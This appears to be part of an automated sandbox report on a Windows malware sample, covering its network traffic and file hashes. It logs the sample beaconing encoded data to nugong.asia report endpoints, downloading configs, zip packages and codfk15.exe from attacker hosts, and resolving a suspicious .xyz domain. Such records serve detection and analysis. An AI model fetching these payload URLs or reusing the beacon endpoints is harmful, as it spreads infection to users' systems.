/report/report_data?data=b26a79cea204f54a9c370b6a1cccc50b5bb992835b01fa10452c1698483b553b4ecd305bdb80e30556bab29d9ba195bc7bc425e6c3a804fc8bdd9aa5cee13373d3a8a13b86b22f6aea7db0c272a92108cf7c966ec1eccdeb593526ac8f755910c04aca2c7a3f39c378f01a4751e77a7009a7a10d3d84969ce72f245e6122069982534a4a432e7b61fff47230c8b5824ca5ef63f534d272b5f34582aa287656a831207e053344fd01d723f227f882cdcccb67fc75af9b657a95f61a3df209afa47ae8d60efbb076a5c109c87ede643cf4b4f8e713b5cf2e8c2844bb4914a3a3fcfbeae9da6cd101082eea80d9643860c6c02fe0a87c82927cab3946545e2e1c00ffa7dc35dde4b8a7c6cea977c468cf5558d7b5fa41e180ffe0ed3f5740fe236accf4a104cc54fac8007c3343247e6e40a657d3a3bb35005efd9b3bc962b98bef31e289dd98a036f21b2678f6216636a3341903521116f1d12060b50f73e0fb7f28e7dc6251128477cdc4e777cfcca46bb56e16d20d65e3ee7660bf3c537d0053b77c03eaa4923a06508288210481b5150330b26ef92ca523a743d1b3264d937bc2c115085abd46b8eae6ec9c6f288b201f198a8d3977c5dade52cb1bd1e9d4b257afb8be23307c5c51199d3bf86790578155e9069f078b6b30d30d3a11649c2629418689e87302c7f30f094c60c5a7b3d6d0f4fbb03cd1360b4ca7ff4ef710ea4c18c7b1f75c0ef0ee926d4fe67aee11fabe33bf288d3d344c0c05db343eae17fb3cfb9c40d6b8c6085f2fb14b1ad299fb506a26dae87f8a5fda3f1c0009cb930585271e8f8a0ddf8e72dff0ca0fe0f37393ac4760d773a519cd0fcaa60a3e12 HTTP/1.1
Host: nreprot.nugong.asia
ResponseHTTP/1.1 200 OK
Date: Thu, 16 Nov 2023 12:04:06 GMT
Content-Type: text/html; charset=utf-8
X-AspNetMvc-Version: 5.2
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Cache-Lookup: Cache Miss
X-Cache-Lookup: Hit From Inner Cluster
Cache-Control: private
Content-Length: 3
X-NWS-LOG-UUID: 248686452332715798
Connection: keep-alive
X-Cache-Lookup: Cache Miss
-
GEThttp://mprrpt.nugong.asia/report.php?data=b26a79cea204f54a9c370b6a1cccc50b5bb992835b01fa10452c1698483b553b4ecd305bdb80e30556bab29d9ba195bc7bc425e6c3a804fc8bdd9aa5cee13373d3a8a13b86b22f6aea7db0c272a92108cf7c966ec1eccdeb593526ac8f755910c04aca2c7a3f39c378f01a4751e77a7009a7a10d3d84969ce72f245e6122069982534a4a432e7b61fff47230c8b5824ca5ef63f534d272b5f34582aa287656a831207e053344fd01d723f227f882cdcccb67fc75af9b657a95f61a3df209afa47ae8d60efbb076a5c109c87ede643cf4b4f8e713b5cf2e8c2844bb4914a3a3fcfbeae9da6cd101082eea80d9643860c6c02fe0a87c82927cab3946545e2e1c00ffa7dc35dde4b8a7c6cea977c468cf5558d7b5fa41e180ffe0ed3f5740fe236accf4a104cc54fac8007c3343247e6e40a657d3a3bb35005efd9b3bc962b98bef31e289dd98a036f21b2678f6216636a3341903521116f1d12060b50f73e0fb7f28e7dc6251128477cdc4e777cfcca46bb56e16d20d65e3ee7660bf3c537d0053b77c03eaa4923a06508288210481b5150330b26ef92ca523a743d1b3264d937bc2c115085abd46b8eae6ec9c6f288b201f198a8d3977c5dade52cb1bd1e9d4b257afb8be23307c5c51199d3bf86790578155e9069f078b6b30d30d3a11649c2629418689e87302c7f30f094c60c5a7b3d6d0f4fbb03cd1360b4ca7ff4ef710ea4c18c7b1f75c0ef0ee926d4fe67aee11fabe33bf288d3d344c0c05db343eae17fb3cfb9c40d6b8c6085f2fb14b1ad299fb506a26dae87f8a5fda3f1c0009cb930585271e8f8a0ddf8e72dff0ca0fe0f37393ac4760d773a519cd0fcaa60a3e12charmap.exeRemote address:119.167.229.212:80RequestGET /report.php?data=b26a79cea204f54a9c370b6a1cccc50b5bb992835b01fa10452c1698483b553b4ecd305bdb80e30556bab29d9ba195bc7bc425e6c3a804fc8bdd9aa5cee13373d3a8a13b86b22f6aea7db0c272a92108cf7c966ec1eccdeb593526ac8f755910c04aca2c7a3f39c378f01a4751e77a7009a7a10d3d84969ce72f245e6122069982534a4a432e7b61fff47230c8b5824ca5ef63f534d272b5f34582aa287656a831207e053344fd01d723f227f882cdcccb67fc75af9b657a95f61a3df209afa47ae8d60efbb076a5c109c87ede643cf4b4f8e713b5cf2e8c2844bb4914a3a3fcfbeae9da6cd101082eea80d9643860c6c02fe0a87c82927cab3946545e2e1c00ffa7dc35dde4b8a7c6cea977c468cf5558d7b5fa41e180ffe0ed3f5740fe236accf4a104cc54fac8007c3343247e6e40a657d3a3bb35005efd9b3bc962b98bef31e289dd98a036f21b2678f6216636a3341903521116f1d12060b50f73e0fb7f28e7dc6251128477cdc4e777cfcca46bb56e16d20d65e3ee7660bf3c537d0053b77c03eaa4923a06508288210481b5150330b26ef92ca523a743d1b3264d937bc2c115085abd46b8eae6ec9c6f288b201f198a8d3977c5dade52cb1bd1e9d4b257afb8be23307c5c51199d3bf86790578155e9069f078b6b30d30d3a11649c2629418689e87302c7f30f094c60c5a7b3d6d0f4fbb03cd1360b4ca7ff4ef710ea4c18c7b1f75c0ef0ee926d4fe67aee11fabe33bf288d3d344c0c05db343eae17fb3cfb9c40d6b8c6085f2fb14b1ad299fb506a26dae87f8a5fda3f1c0009cb930585271e8f8a0ddf8e72dff0ca0fe0f37393ac4760d773a519cd0fcaa60a3e12 HTTP/1.1
Host: mprrpt.nugong.asia
ResponseHTTP/1.1 200 OK
Date: Thu, 16 Nov 2023 12:04:06 GMT
Content-Type: application/octet-stream
Content-Type: text/html
X-Cache-Lookup: Cache Miss
Content-Length: 3
X-NWS-LOG-UUID: 15826347961273132102
Connection: keep-alive
X-Cache-Lookup: Cache Miss
-
Remote address:8.8.8.8:53Requestfeoin.gognos.cnIN AResponsefeoin.gognos.cnIN A43.249.192.68feoin.gognos.cnIN A222.173.195.26
-
Remote address:43.249.192.68:59115RequestGET /codfk15.exe HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Host: feoin.gognos.cn:59115
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Last-Modified: Wed, 08 Nov 2023 13:21:26 GMT
Accept-Ranges: bytes
ETag: "e3c1f4794612da1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Thu, 16 Nov 2023 12:04:08 GMT
Content-Length: 14780000
-
119.167.229.212:443down.nugong.asiatlsaadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe13.1kB 486.6kB 242 363
-
75.6kB 2.7MB 1311 1979
HTTP Request
GET http://down.nugong.asia/cfg/cmc/ping.txtHTTP Response
200HTTP Request
GET http://down.nugong.asia/cfg/cmc/ping.txtHTTP Response
200HTTP Request
GET http://down.nugong.asia/cfg/cmc/userchange.txtHTTP Response
200HTTP Request
GET http://down.nugong.asia/cfg/cmc/userpq.zipHTTP Response
200HTTP Request
GET http://down.nugong.asia/cfg/cmc/blacklist.txtHTTP Response
200HTTP Request
GET http://down.nugong.asia/cfg/user/c995ec7fd4f57c0d/a8f5d6fe5664609d.jsonHTTP Response
200HTTP Request
GET http://down.nugong.asia/cfg/pub/ms.jsonHTTP Response
200HTTP Request
GET http://down.nugong.asia/cfg/pub/ps.jsonHTTP Response
200HTTP Request
GET http://down.nugong.asia/pgm/mds/186dc678628340ee/90a22928787e3b5a341729d845ab26d5f93b9db0120714d864.zipHTTP Response
200HTTP Request
GET http://down.nugong.asia/pgm/mds/05631e93ccdb00ee/945f98f10df53a8f1cfb3848c371d6e3829473480dc6631564.zipHTTP Response
200HTTP Request
GET http://down.nugong.asia/pgm/mds/006866ef1b75dc55/30d51089d778d32a4d22077fb983ba81fd82d4cf417ac62464.zipHTTP Response
200HTTP Request
GET http://down.nugong.asia/cfg/cmc/Lander.txtHTTP Response
200HTTP Request
GET http://down.nugong.asia/cfg/cmc/psexe.txtHTTP Response
200HTTP Request
GET http://down.nugong.asia/cfg/cmc/urlmd5.jsonHTTP Response
200 -
1.4kB 5.1kB 15 13
HTTP Request
GET https://apps.game.qq.com/comm-htdocs/ip/get_ip.phpHTTP Response
200 -
119.167.229.212:443down.nugong.asiatlsaadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe1.5kB 1.1kB 10 11
-
36.143.236.7:80http://ocsp.trust-provider.cn/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTRK6%2BKMEm7xEAA7oRlXypSzGx%2FAgQUyPPFCRszol%2BmEquQ1gC2XPyNHAYCEFeRTDpozwT3OxvpMIocpu0%3Dhttpaadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe910 B 3.2kB 9 6
HTTP Request
GET http://ocsp.trust-provider.cn/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTRK6%2BKMEm7xEAA7oRlXypSzGx%2FAgQUyPPFCRszol%2BmEquQ1gC2XPyNHAYCEFeRTDpozwT3OxvpMIocpu0%3DHTTP Response
200 -
47.246.48.205:80http://ocsp.digicert.cn/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQhnxEBNL9LgIhfSsTcHsrTt204QgQURNnISjOO01KNp5KUYR%2BayKW37MsCEAlZRMywkYGXHkcMpMgpr8c%3Dhttpcharmap.exe734 B 2.1kB 6 4
HTTP Request
GET http://ocsp.digicert.cn/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAbJNRrm8KxusAb7DCqnMkE%3DHTTP Response
200HTTP Request
GET http://ocsp.digicert.cn/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQhnxEBNL9LgIhfSsTcHsrTt204QgQURNnISjOO01KNp5KUYR%2BayKW37MsCEAlZRMywkYGXHkcMpMgpr8c%3DHTTP Response
200 -
103.235.47.7:443https://sp1.baidu.com/8aQDcjqpAAV3otqbppnN2DJv/api.php?query=154.61.71.13&resource_id=6006&ie=utf8&oe=gbk&format=jsontls, httpcharmap.exe1.5kB 11.3kB 19 22
HTTP Request
GET https://sp1.baidu.com/8aQDcjqpAAV3otqbppnN2DJv/api.php?query=154.61.71.13&resource_id=6006&ie=utf8&oe=gbk&format=jsonHTTP Response
200 -
359 B 2.6kB 5 4
HTTP Request
GET http://crl.globalsign.com/root-r3.crlHTTP Response
200 -
104.18.21.226:80http://ocsp2.globalsign.com/rootr3/ME4wTDBKMEgwRjAJBgUrDgMCGgUABBT1nGh%2FJBjWKnkPdZIzB1bqhelHBwQUj%2FBLf6guRSSuTVD6Y5qL3uLdG7wCDQHuXyId%2FGI71DM6hVc%3Dhttpcharmap.exe473 B 2.1kB 5 4
HTTP Request
GET http://ocsp2.globalsign.com/rootr3/ME4wTDBKMEgwRjAJBgUrDgMCGgUABBT1nGh%2FJBjWKnkPdZIzB1bqhelHBwQUj%2FBLf6guRSSuTVD6Y5qL3uLdG7wCDQHuXyId%2FGI71DM6hVc%3DHTTP Response
200 -
119.167.229.212:80http://mprrpt.nugong.asia/report.php?data=b26a79cea204f54a9c370b6a1cccc50b5bb992835b01fa10452c1698483b553b4ecd305bdb80e30556bab29d9ba195bc7bc425e6c3a804fc8bdd9aa5cee13373d3a8a13b86b22f6aea7db0c272a92108cf7c966ec1eccdeb593526ac8f755910c04aca2c7a3f39c378f01a4751e77a7009a7a10d3d84969ce72f245e6122069982534a4a432e7b61fff47230c8b5824ca5ef63f534d272b5f34582aa287656a831207e053344fd01d723f227f882cdcccb67fc75af9b657a95f61a3df209afa47ae8d60efbb076a5c109c87ede643cf4b4f8e713b5cf2e8c2844bb4914a3a3fcfbeae9da6cd101082eea80d9643860c6c02fe0a87c82927cab3946545e2e1c00ffa7dc35dde4b8a7c6cea977c468cf5558d7b5fa41e180ffe0ed3f5740fe236accf4a104cc54fac8007c3343247e6e40a657d3a3bb35005efd9b3bc962b98bef31e289dd98a036f21b2678f6216636a3341903521116f1d12060b50f73e0fb7f28e7dc6251128477cdc4e777cfcca46bb56e16d20d65e3ee7660bf3c537d0053b77c03eaa4923a06508288210481b5150330b26ef92ca523a743d1b3264d937bc2c115085abd46b8eae6ec9c6f288b201f198a8d3977c5dade52cb1bd1e9d4b257afb8be23307c5c51199d3bf86790578155e9069f078b6b30d30d3a11649c2629418689e87302c7f30f094c60c5a7b3d6d0f4fbb03cd1360b4ca7ff4ef710ea4c18c7b1f75c0ef0ee926d4fe67aee11fabe33bf288d3d344c0c05db343eae17fb3cfb9c40d6b8c6085f2fb14b1ad299fb506a26dae87f8a5fda3f1c0009cb930585271e8f8a0ddf8e72dff0ca0fe0f37393ac4760d773a519cd0fcaa60a3e12httpcharmap.exe28.7kB 1.3MB 552 969
HTTP Request
GET http://down.nugong.asia/pgm/mds/b9aa4771a06003c1/4c3c71ab6fb06a3ec85c07a85e2af9e361998acec86eaa1e64.zipHTTP Response
200HTTP Request
GET http://down.nugong.asia/pgm/mds/62761afc2f0d796a/2087d126bded15fb341729d845ab26d5124b01e56782ef7664.zipHTTP Response
200HTTP Request
GET http://down.nugong.asia/pgm/mds/865609897d54b79b/502855f63d5364d77a01f5e8125b4fe59af4f34fd4851c3764.zipHTTP Response
200HTTP Request
GET http://nreprot.nugong.asia/report/report_data?data=b26a79cea204f54a9c370b6a1cccc50b5bb992835b01fa10452c1698483b553b4ecd305bdb80e30556bab29d9ba195bc7bc425e6c3a804fc8bdd9aa5cee13373d3a8a13b86b22f6aea7db0c272a92108cf7c966ec1eccdeb593526ac8f755910c04aca2c7a3f39c378f01a4751e77a7009a7a10d3d84969ce72f245e6122069982534a4a432e7b61fff47230c8b5824ca5ef63f534d272b5f34582aa287656a831207e053344fd01d723f227f882cdcccb67fc75af9b657a95f61a3df209afa47ae8d60efbb076a5c109c87ede643cf4b4f8e713b5cf2e8c2844bb4914a3a3fcfbeae9da6cd101082eea80d9643860c6c02fe0a87c82927cab3946545e2e1c00ffa7dc35dde4b8a7c6cea977c468cf5558d7b5fa41e180ffe0ed3f5740fe236accf4a104cc54fac8007c3343247e6e40a657d3a3bb35005efd9b3bc962b98bef31e289dd98a036f21b2678f6216636a3341903521116f1d12060b50f73e0fb7f28e7dc6251128477cdc4e777cfcca46bb56e16d20d65e3ee7660bf3c537d0053b77c03eaa4923a06508288210481b5150330b26ef92ca523a743d1b3264d937bc2c115085abd46b8eae6ec9c6f288b201f198a8d3977c5dade52cb1bd1e9d4b257afb8be23307c5c51199d3bf86790578155e9069f078b6b30d30d3a11649c2629418689e87302c7f30f094c60c5a7b3d6d0f4fbb03cd1360b4ca7ff4ef710ea4c18c7b1f75c0ef0ee926d4fe67aee11fabe33bf288d3d344c0c05db343eae17fb3cfb9c40d6b8c6085f2fb14b1ad299fb506a26dae87f8a5fda3f1c0009cb930585271e8f8a0ddf8e72dff0ca0fe0f37393ac4760d773a519cd0fcaa60a3e12HTTP Response
200HTTP Request
GET http://mprrpt.nugong.asia/report.php?data=b26a79cea204f54a9c370b6a1cccc50b5bb992835b01fa10452c1698483b553b4ecd305bdb80e30556bab29d9ba195bc7bc425e6c3a804fc8bdd9aa5cee13373d3a8a13b86b22f6aea7db0c272a92108cf7c966ec1eccdeb593526ac8f755910c04aca2c7a3f39c378f01a4751e77a7009a7a10d3d84969ce72f245e6122069982534a4a432e7b61fff47230c8b5824ca5ef63f534d272b5f34582aa287656a831207e053344fd01d723f227f882cdcccb67fc75af9b657a95f61a3df209afa47ae8d60efbb076a5c109c87ede643cf4b4f8e713b5cf2e8c2844bb4914a3a3fcfbeae9da6cd101082eea80d9643860c6c02fe0a87c82927cab3946545e2e1c00ffa7dc35dde4b8a7c6cea977c468cf5558d7b5fa41e180ffe0ed3f5740fe236accf4a104cc54fac8007c3343247e6e40a657d3a3bb35005efd9b3bc962b98bef31e289dd98a036f21b2678f6216636a3341903521116f1d12060b50f73e0fb7f28e7dc6251128477cdc4e777cfcca46bb56e16d20d65e3ee7660bf3c537d0053b77c03eaa4923a06508288210481b5150330b26ef92ca523a743d1b3264d937bc2c115085abd46b8eae6ec9c6f288b201f198a8d3977c5dade52cb1bd1e9d4b257afb8be23307c5c51199d3bf86790578155e9069f078b6b30d30d3a11649c2629418689e87302c7f30f094c60c5a7b3d6d0f4fbb03cd1360b4ca7ff4ef710ea4c18c7b1f75c0ef0ee926d4fe67aee11fabe33bf288d3d344c0c05db343eae17fb3cfb9c40d6b8c6085f2fb14b1ad299fb506a26dae87f8a5fda3f1c0009cb930585271e8f8a0ddf8e72dff0ca0fe0f37393ac4760d773a519cd0fcaa60a3e12HTTP Response
200 -
288.1kB 15.2MB 5872 10873
HTTP Request
GET http://feoin.gognos.cn:59115/codfk15.exeHTTP Response
200
-
8.8.8.8:5354e03c235962947852b3fe22714547f2.vbnm34567.xyzdnsaadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe184 B 334 B 2 2
DNS Request
54e03c235962947852b3fe22714547f2.vbnm34567.xyz
DNS Request
54e03c235962947852b3fe22714547f2.vbnm34567.xyz
-
114.114.114.114:53down.nugong.asiadnsaadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe62 B 392 B 1 1
DNS Request
down.nugong.asia
DNS Response
119.167.229.212123.12.213.220123.12.213.243211.93.212.232218.29.50.234221.15.67.14536.248.54.85123.12.213.187118.212.235.10958.144.226.248110.249.196.101118.212.235.10242.56.81.104118.212.235.23142.231.136.215
-
62 B 94 B 1 1
DNS Request
apps.game.qq.com
DNS Response
101.227.134.49101.227.134.27
-
8.8.8.8:53ocsp.trust-provider.cndnsaadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe68 B 300 B 1 1
DNS Request
ocsp.trust-provider.cn
DNS Response
36.143.236.736.248.38.100111.13.153.152111.48.138.18111.206.23.199112.50.95.96117.27.246.96119.36.90.164
-
62 B 122 B 1 1
DNS Request
ocsp.digicert.cn
DNS Response
47.246.48.205
-
59 B 176 B 1 1
DNS Request
sp1.baidu.com
DNS Response
103.235.47.7103.235.47.102103.235.47.103103.235.46.40
-
64 B 179 B 1 1
DNS Request
crl.globalsign.com
DNS Response
104.18.20.226104.18.21.226
-
46 B 1
-
1.1kB 12
-
60 B 1
-
61 B 93 B 1 1
DNS Request
feoin.gognos.cn
DNS Response
43.249.192.68222.173.195.26
-
46 B 1
-
46 B 1
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
746KB
MD504fafcaf36632e03b6bfc48275178349
SHA141191fd8abc13c88aec5a46281d1082a958ed2ff
SHA256c45ee812712c7484d3869811af63d6e78ef885054fe702662104bde5635d8a73
SHA512a251178601db5b53849a7514fc98853720d71e461373e3701289ca9d0c782edf63516bdedc60c17a0d0521db9bfb996a4ffe0d88ddd9ae8c875490bcf47c5f2e
-
Filesize
61KB
MD5f3441b8572aae8801c04f3060b550443
SHA14ef0a35436125d6821831ef36c28ffaf196cda15
SHA2566720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf
SHA5125ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9
-
Filesize
163KB
MD59441737383d21192400eca82fda910ec
SHA1725e0d606a4fc9ba44aa8ffde65bed15e65367e4
SHA256bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5
SHA5127608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf
-
Filesize
14.1MB
MD5b66fb2f31bbc7538ade44d5f5d57675f
SHA130c2444dc89cbd6f099d21f00d432ade619ad13d
SHA2563b09106f7813ab3e5b7350d269446298291a2722bdf65f705c749725c11fc2a5
SHA512631307a706880c9fa87dc676169f6130c8150d266823dd7e446a29ea0726b9c81d1944f2cbdb3421b81a7770be90231dbc766aaa3d2cec16265c6f8249f47580
-
Filesize
162KB
MD5b4c2ce57f51b9f62956d256eb68973ed
SHA1c6e1ff5d4720d344da996c128f987ce64354e584
SHA256d584f2cdb5b31af93bb7e7e188a7575eafe18e0a786f36bd1236cac79d9bfaa4
SHA5128bcdcf560c69e4bac0f2c611cbf7c27a347fdb00ceb9a160a117a0abffcc7763e2f7d4b8eecc1bccae3316c4dc69a2df75ddbde3222f63bc7fed5ef8b76f7921